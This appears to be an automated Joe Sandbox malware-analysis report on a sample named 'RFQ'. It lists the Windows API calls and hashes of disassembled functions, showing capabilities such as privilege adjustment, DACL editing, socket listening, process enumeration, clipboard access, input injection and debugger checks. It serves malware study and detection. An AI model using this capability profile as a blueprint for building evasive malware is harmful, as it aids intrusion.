                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                          • String ID: SeShutdownPrivilege
                                                                          • API String ID: 2938487562-3733053543
                                                                          • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                          • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                          • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                          • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                          APIs
                                                                            • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                            • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                            • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                            • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                          • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                          • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                          • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                          • String ID:
                                                                          • API String ID: 1255039815-0
                                                                          • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                          • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                          • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                          • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                          APIs
                                                                          • __swprintf.LIBCMT ref: 00433073
                                                                          • __swprintf.LIBCMT ref: 00433085
                                                                          • __wcsicoll.LIBCMT ref: 00433092
                                                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                          • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                          • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                          • LockResource.KERNEL32(?), ref: 00433120
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                          • String ID:
                                                                          • API String ID: 1158019794-0
                                                                          • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                          • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                          • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                          • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                          • String ID:
                                                                          • API String ID: 1737998785-0
                                                                          • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                          • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                          • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                          • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                          • GetLastError.KERNEL32 ref: 0045D6BF
                                                                          • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                          • API String ID: 4194297153-14809454
                                                                          • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                          • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                          • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                          • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$_strncmp
                                                                          • String ID: @oH$\$^$h
                                                                          • API String ID: 2175499884-3701065813
                                                                          • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                          • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                          • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                          • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                          APIs
                                                                          • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                          • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$closesocket$bindlistensocket
                                                                          • String ID:
                                                                          • API String ID: 540024437-0
                                                                          • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                          • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                          • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                          • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                          Strings
Memory Dump Source
• Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID:
• String ID: ERCP$VUUU$VUUU$VUUU$XjH
• API String ID: 0-2872873767
• Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
• Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
• Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
• Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
• __wsplitpath.LIBCMT ref: 00475644
  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
• _wcscat.LIBCMT ref: 00475657
• __wcsicoll.LIBCMT ref: 0047567B
• Process32NextW.KERNEL32(00000000,?), ref: 004756AB
• CloseHandle.KERNEL32(00000000), ref: 004756BA
Memory Dump Source
• Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
• String ID:
• API String ID: 2547909840-0
• Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
• Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
• Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
• Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• FindFirstFileW.KERNEL32(?,?), ref: 004524DF
• Sleep.KERNEL32(0000000A), ref: 0045250B
• FindNextFileW.KERNEL32(?,?), ref: 004525E9
• FindClose.KERNEL32(?), ref: 004525FF
Strings
Memory Dump Source
• Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
• String ID: *.*$\VH
• API String ID: 2786137511-2657498754
• Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
• Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
• Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
• Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
APIs
• IsDebuggerPresent.KERNEL32 ref: 00421FC1
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
• UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
• GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
• TerminateProcess.KERNEL32(00000000), ref: 00422004
Strings
Memory Dump Source
• Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• String ID: pqI
• API String ID: 2579439406-2459173057
• Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
• Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
• Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
• Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
APIs
• __wcsicoll.LIBCMT ref: 00433349
• mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
• __wcsicoll.LIBCMT ref: 00433375
• mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
Strings
Memory Dump Source
• Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID: __wcsicollmouse_event
• String ID: DOWN
• API String ID: 1033544147-711622031
• Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
• Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
• Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
• Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
APIs
• GetKeyboardState.USER32(?), ref: 0044C3D2
• SetKeyboardState.USER32(00000080), ref: 0044C3F6
• PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
• PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
• SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
Memory Dump Source
• Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID: KeyboardMessagePostState$InputSend
• String ID:
• API String ID: 3031425849-0
• Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
• Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
• Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
• Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
APIs
  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
• socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
• WSAGetLastError.WSOCK32(00000000), ref: 00476692
Memory Dump Source
• Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID: ErrorLastinet_addrsocket
• String ID:
• API String ID: 4170576061-0
• Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
• Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
• Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
• Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
APIs
  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
• IsWindowVisible.USER32 ref: 0047A368
• IsWindowEnabled.USER32 ref: 0047A378
• GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
• IsIconic.USER32 ref: 0047A393
• IsZoomed.USER32 ref: 0047A3A1
Memory Dump Source
• Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
• Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
• Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
• Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
APIs
  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
• CoInitialize.OLE32(00000000), ref: 00478442
• CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
• CoUninitialize.OLE32 ref: 0047863C
Strings
Memory Dump Source
• Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
• Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
• Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
• Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
• Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
APIs
• OpenClipboard.USER32(?), ref: 0046DCE7
